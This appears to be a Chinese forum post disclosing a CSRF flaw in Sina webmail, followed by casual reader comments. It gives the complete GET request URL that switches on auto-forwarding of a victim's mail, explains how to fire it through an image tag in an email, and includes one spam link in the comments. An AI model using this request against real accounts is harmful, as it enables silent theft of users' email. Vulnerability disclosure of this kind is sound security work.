新浪一处搞笑的CSRF，可以窃取用户邮件

admin

这几天，把SINA/SOHU/163通通CSRF了一遍。。国内普通不重视CSRF啊。为什么说这个搞笑呢? 因为形式上，这个链接是做了CSRF防范的，可事实上。。。

可以修改用户邮箱设置，而且可以使用GET方式。所以，攻击者可以直接<IMG SRC=xxx>发封邮件给对方，对方只要一看到这封邮件即刻中标。
我的demo中是把用户邮件全转到一个指定邮箱。。。当然，还可以干别的设置。所以，这个算相当高危的吧。。。
话说，你们那TOKEN......和尚头上的虱子啊.....

http://m1.mail.sina.com.cn/wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&[email protected]&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

&#8203;
修复方案：
token啊token

我不是你爱的人

@,@..是什么意思呀？  

一见你就烦

哥最近喜欢上了顶贴，因为，如果帖子火了，那有哥的功劳。如果帖子被顶沉了....哥也会很有成就感...因为是哥搞沉的~~大家切记~不要迷恋哥~哥只是一个传说  

oyym00

回帖是种美德.  

难得糊涂

天泽在线http://www.ak69v.com，升官发财  

邋里邋遢

回个帖子支持一下！

甘心替代你

不错不错.,..我喜欢